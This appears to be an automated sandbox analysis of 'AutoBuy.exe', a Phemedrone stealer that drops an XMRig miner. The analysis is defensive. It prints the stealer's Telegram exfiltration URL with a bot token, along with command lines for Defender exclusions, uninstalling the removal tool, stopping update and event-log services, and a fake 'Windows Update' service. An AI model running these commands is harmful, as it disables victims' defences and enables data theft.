Analysis
-
max time kernel
600s -
max time network
598s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 22:11
Static task
static1
Behavioral task
behavioral1
Sample
AutoBuy.exe
Resource
win10v2004-20240508-en
General
-
Target
AutoBuy.exe
-
Size
2.8MB
-
MD5
ec3328cb44fb4e760b5cdef7bbbcd6f6
-
SHA1
d93d74a1200418ec041d4206513d511da870eaec
-
SHA256
ceb1bbd8e4e6d29926c8011524897693a3240a4bda727d309987a6541cd98907
-
SHA512
e33563185221acfaf7352a37555f8b1c4f73a962f4ae96e1dee52e8f034bc416fee22dff8bba698b596576470c0572abcf5e2dea1929f6151aac05678e78ca01
-
SSDEEP
49152:JxppTslWVwj1GowiT4QRW5CX42rZSkvFksV4qBNmP+X:JxpHVwIozyg3jvbVHBNI
Malware Config
Extracted
phemedrone
https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendMessage?chat_id=-4194654645
Signatures
-
Phemedrone
An information and wallet stealer written in C#.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/3576-209-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-215-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-214-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-213-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-212-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-211-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-208-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-229-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-230-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-232-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-234-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/3576-233-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 4704 powershell.exe 4704 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
Processes:
java.exeupdate.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts java.exe File created C:\Windows\system32\drivers\etc\hosts update.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
AutoBuy.exejava2.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation AutoBuy.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation java2.exe -
Executes dropped EXE 4 IoCs
Processes:
java2.exevlad.exejava.exeupdate.exepid process 376 java2.exe 2376 vlad.exe 400 java.exe 1796 update.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/3576-204-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-203-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-209-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-215-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-214-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-213-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-212-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-211-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-208-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-207-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-206-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-205-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-229-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-230-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-232-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-234-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/3576-233-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ip-api.com -
Drops file in System32 directory 4 IoCs
Processes:
java.exepowershell.exeupdate.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe java.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe update.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
update.exedescription pid process target process PID 1796 set thread context of 3276 1796 update.exe conhost.exe PID 1796 set thread context of 3576 1796 update.exe explorer.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1696 sc.exe 2388 sc.exe 5052 sc.exe 4360 sc.exe 4060 sc.exe 3460 sc.exe 4756 sc.exe 1912 sc.exe 3984 sc.exe 4924 sc.exe 4956 sc.exe 3088 sc.exe 3204 sc.exe 764 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
vlad.exetaskmgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz vlad.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 vlad.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe -
Modifies registry class 1 IoCs
Processes:
AutoBuy.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ AutoBuy.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
vlad.exejava.exepowershell.exeupdate.exepowershell.exetaskmgr.exepid process 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 2376 vlad.exe 400 java.exe 4704 powershell.exe 4704 powershell.exe 4704 powershell.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 400 java.exe 1796 update.exe 4704 powershell.exe 4704 powershell.exe 4704 powershell.exe 1796 update.exe 1796 update.exe 1796 update.exe 1796 update.exe 1796 update.exe 1796 update.exe 1796 update.exe 1796 update.exe 1796 update.exe 1796 update.exe 1796 update.exe 1796 update.exe 4072 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
vlad.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exeexplorer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetaskmgr.exedescription pid process Token: SeDebugPrivilege 2376 vlad.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeShutdownPrivilege 2724 powercfg.exe Token: SeCreatePagefilePrivilege 2724 powercfg.exe Token: SeShutdownPrivilege 3204 powercfg.exe Token: SeCreatePagefilePrivilege 3204 powercfg.exe Token: SeShutdownPrivilege 2524 powercfg.exe Token: SeCreatePagefilePrivilege 2524 powercfg.exe Token: SeShutdownPrivilege 1696 powercfg.exe Token: SeCreatePagefilePrivilege 1696 powercfg.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeLockMemoryPrivilege 3576 explorer.exe Token: SeShutdownPrivilege 212 powercfg.exe Token: SeCreatePagefilePrivilege 212 powercfg.exe Token: SeShutdownPrivilege 3604 powercfg.exe Token: SeCreatePagefilePrivilege 3604 powercfg.exe Token: SeShutdownPrivilege 4300 powercfg.exe Token: SeCreatePagefilePrivilege 4300 powercfg.exe Token: SeShutdownPrivilege 4668 powercfg.exe Token: SeCreatePagefilePrivilege 4668 powercfg.exe Token: SeDebugPrivilege 4072 taskmgr.exe Token: SeSystemProfilePrivilege 4072 taskmgr.exe Token: SeCreateGlobalPrivilege 4072 taskmgr.exe Token: 33 4072 taskmgr.exe Token: SeIncBasePriorityPrivilege 4072 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe 4072 taskmgr.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
AutoBuy.exejava2.execmd.execmd.exeupdate.exedescription pid process target process PID 3864 wrote to memory of 376 3864 AutoBuy.exe java2.exe PID 3864 wrote to memory of 376 3864 AutoBuy.exe java2.exe PID 3864 wrote to memory of 2376 3864 AutoBuy.exe vlad.exe PID 3864 wrote to memory of 2376 3864 AutoBuy.exe vlad.exe PID 3864 wrote to memory of 2376 3864 AutoBuy.exe vlad.exe PID 376 wrote to memory of 400 376 java2.exe java.exe PID 376 wrote to memory of 400 376 java2.exe java.exe PID 2376 wrote to memory of 1348 2376 cmd.exe wusa.exe PID 2376 wrote to memory of 1348 2376 cmd.exe wusa.exe PID 1516 wrote to memory of 1704 1516 cmd.exe wusa.exe PID 1516 wrote to memory of 1704 1516 cmd.exe wusa.exe PID 1796 wrote to memory of 3276 1796 update.exe conhost.exe PID 1796 wrote to memory of 3276 1796 update.exe conhost.exe PID 1796 wrote to memory of 3276 1796 update.exe conhost.exe PID 1796 wrote to memory of 3276 1796 update.exe conhost.exe PID 1796 wrote to memory of 3276 1796 update.exe conhost.exe PID 1796 wrote to memory of 3276 1796 update.exe conhost.exe PID 1796 wrote to memory of 3276 1796 update.exe conhost.exe PID 1796 wrote to memory of 3276 1796 update.exe conhost.exe PID 1796 wrote to memory of 3276 1796 update.exe conhost.exe PID 1796 wrote to memory of 3576 1796 update.exe explorer.exe PID 1796 wrote to memory of 3576 1796 update.exe explorer.exe PID 1796 wrote to memory of 3576 1796 update.exe explorer.exe PID 1796 wrote to memory of 3576 1796 update.exe explorer.exe PID 1796 wrote to memory of 3576 1796 update.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe"C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Users\Admin\AppData\Local\Temp\java2.exe"C:\Users\Admin\AppData\Local\Temp\java2.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Users\Admin\AppData\Local\Temp\java.exe"C:\Users\Admin\AppData\Local\Temp\java.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:400 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:1348
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:764 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4956 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1912 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3984 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:4756 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2724 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2524 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3204 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "Windows Update"4⤵
- Launches sc.exe
PID:4360 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "Windows Update" binpath= "C:\ProgramData\Microsoft\update.exe" start= "auto"4⤵
- Launches sc.exe
PID:4924 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3088 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "Windows Update"4⤵
- Launches sc.exe
PID:4060 -
C:\Users\Admin\AppData\Local\Temp\vlad.exe"C:\Users\Admin\AppData\Local\Temp\vlad.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:4668
-
C:\ProgramData\Microsoft\update.exeC:\ProgramData\Microsoft\update.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1704
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5052 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3204 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3460 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1696 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2388 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4300 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4668 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3604 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:212 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3276
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4072
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.6MB
MD55dfe953861753222629629ba6121a0bc
SHA1d56d226b950a773d947c7fc42dcff9788a61f4b7
SHA256f23ec1a549bda11f572a2e58f692855a6344bce1ad683ddd730f12342e099975
SHA512aaddb836207c42b6b795ebf8696373d9b4bc56b73cdea47141348955bd49f2d71088d1d97f06813ed5f72b40775c8c25cb23a78048ea4c223e2e4ef7f98d3e2d
-
Filesize
2.1MB
MD5fafce5048ad4b205b36844d78f036435
SHA19e310d6e583722889099bc46f1c8821d31881dab
SHA25639a0270fb0a39cbcc11463681a11fdd7146254c306d79f0500775c09b0ee7eea
SHA512c2d9d1462f9cda573cc676fbafa5b093940e8071c80fe866e33dea8b22f8462f6fb688c3eeb9a6d71f0617b6792a04191639c41ada2c5259a0e5291c63b7e39a
-
Filesize
512KB
MD50dd8757d42380787ba7162a7776f30c5
SHA118465ff3c76fc6c441a195b679047f9089b269de
SHA256a6ed050ec8b21feafd3335a3396258be13a2d29601030be8f4b20c682759a2fb
SHA512d0a8354a7af21702f70b5ef7f3440a4755b6e1bb4e39a5c821fcac34e2f019dc73243764ef037efb2ad4de05855ced057d95bc8cdfa1c74ebb27194421297c22
-
Filesize
3KB
MD52d29fd3ae57f422e2b2121141dc82253
SHA1c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA25680a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68